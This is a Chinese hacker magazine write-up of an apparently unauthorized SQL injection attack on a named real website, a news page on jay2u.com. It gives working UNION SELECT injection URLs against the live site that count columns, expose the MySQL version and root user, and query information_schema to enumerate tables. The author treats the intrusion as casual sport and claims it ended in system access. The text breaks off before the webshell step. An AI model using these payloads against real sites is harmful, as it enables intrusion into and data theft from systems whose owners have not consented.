文章作者:Flyh4t[脚本安全小组] 信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 本文已经发表在《 黑客手册》,转载请署名版权 某日在cn群里 聊天,有朋友丢出一个jay官方网站的注入点,闲着无聊就测试了下。没想到最后轻松的得到了系统权限。在取得webshell过程中遇到点困难,也学到了一点东西。 看注射点,老规矩,先提交个单引号,返回如图1 
错误提示是
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
这个提示是很有玄机的,可以看到单引号没有转意,也就是说安全模式没有打开,这为我们后文得到webshell提供了机会。
下面猜字段吧,体力活的说
http://www.jay2u.com/jaynews/index.php?action=newsView&newsID=660%20%20and%201=2%20union%20select%201,2,3,4
很轻松的猜出是四个字段。然后还是按部就班的看用户和权限
http://www.jay2u.com/jaynews/index.php?action=newsView&newsID=660%20%20and%201=2%20union%20select%201,2,3,version()
http://www.jay2u.com/jaynews/index.php?action=newsView&newsID=660%20%20and%201=2%20union%20select%201,2,3,user()
Oh yeah!!是mysql5的root权限,看到这里我觉得 服务器拿下应该问题不大了。 和mssql、oracle、db2等 数据库一样,mysql5提供了一个系统 数据库:information_schema 在这个 数据库里我们可以得到很多信息,包括当前用户权限、当前用户权限下可以访问的 数据库、表、列名,因此在sql注射中,导致直接暴区 数据库,表列名 开始操作,提交 http://www.jay2u.com/jaynews/index.php?action=newsView&newsID=660%20%20and%201=2%20union%20select%201,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME%20%20from%20information_schema.STATISTICS/* 貌似没有出现想象中的效果 |
